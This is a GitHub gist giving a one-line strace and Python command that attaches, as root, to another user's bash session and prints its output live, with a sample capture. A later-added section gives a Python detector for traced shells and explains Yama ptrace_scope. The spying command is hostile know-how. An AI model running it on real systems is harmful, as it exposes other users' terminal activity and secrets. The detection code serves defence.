Gist wargio/be8de87571e6dbdd2866d6d54246b9b5, last active March 8, 2019 10:16
Simple script to spy on a shell via strace + python (one line)
## just find the pid of the shell
[root]> ps -aux | grep bash
user 28202 0.0 0.1 4464 3696 pts/0 Ss+ 10:26 0:00 -bash
root 28227 0.0 0.1 4360 3760 pts/1 Ss 10:26 0:00 -bash
root 28855 0.0 0.0 3044 884 pts/1 S+ 11:13 0:00 grep bash
## then call the one-line command (python3: print(..., end=, flush=) is Python 3 syntax)
## strace -p<pid> -s9999 -e write 2>&1 | python3 -c "import sys,re;[print(re.sub(r'write\(\d,\s\"(.+)\",\s\d+\)\s+=\s+\d+$|^---.+$', r'\1', line).replace('\n', '').encode('utf-8').decode('unicode_escape'), end='', flush=True) for line in sys.stdin]"
strace -p28202 -s9999 -e write 2>&1 | python3 -c "import sys,re;[print(re.sub(r'write\(\d,\s\"(.+)\",\s\d+\)\s+=\s+\d+$|^---.+$', r'\1', line).replace('\n', '').encode('utf-8').decode('unicode_escape'), end='', flush=True) for line in sys.stdin]"
strace: Process 28202 attached
[user@mydomain.com ~]$ ls aaaa
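Because `strace -p` attaches through ptrace, the traced shell's `/proc/<pid>/status` shows a non-zero `TracerPid` for as long as the command above is running. The following is an added example, not part of the original gist, that lists shells with a tracer attached and reports the Yama `ptrace_scope` setting; the function names and the `SHELLS` list are assumptions chosen here.

```python
import os

# Yama LSM values of /proc/sys/kernel/yama/ptrace_scope.
YAMA_SCOPES = {
    0: "classic: same-uid processes may attach to each other",
    1: "restricted: only an ancestor or declared tracer may attach",
    2: "admin-only: attaching requires CAP_SYS_PTRACE",
    3: "no attach: PTRACE_ATTACH is refused for everyone, root included",
}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}  # assumed list, extend as needed

def status_fields(status_text):
    """Parse the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def traced_shells(proc_root="/proc"):
    """Return sorted (pid, name, tracer_pid) for shells with a tracer attached."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "status")) as fh:
                fields = status_fields(fh.read())
        except OSError:  # process exited or is not readable
            continue
        tracer = int(fields.get("TracerPid", "0"))
        if tracer and fields.get("Name") in SHELLS:
            hits.append((int(entry), fields["Name"], tracer))
    return sorted(hits)

def yama_scope(path="/proc/sys/kernel/yama/ptrace_scope"):
    """Return (value, meaning); value is None when Yama is not available."""
    try:
        with open(path) as fh:
            value = int(fh.read().strip())
    except (OSError, ValueError):
        return None, "Yama ptrace_scope not available"
    return value, YAMA_SCOPES.get(value, "unknown value")

if __name__ == "__main__":
    print("ptrace_scope:", *yama_scope())
    for pid, name, tracer in traced_shells():
        print(f"pid {pid} ({name}) is traced by pid {tracer}")
```

When the tracer runs as root, as in the transcript, it normally holds CAP_SYS_PTRACE, so `ptrace_scope` values 0 to 2 still permit the attach and only 3 refuses it.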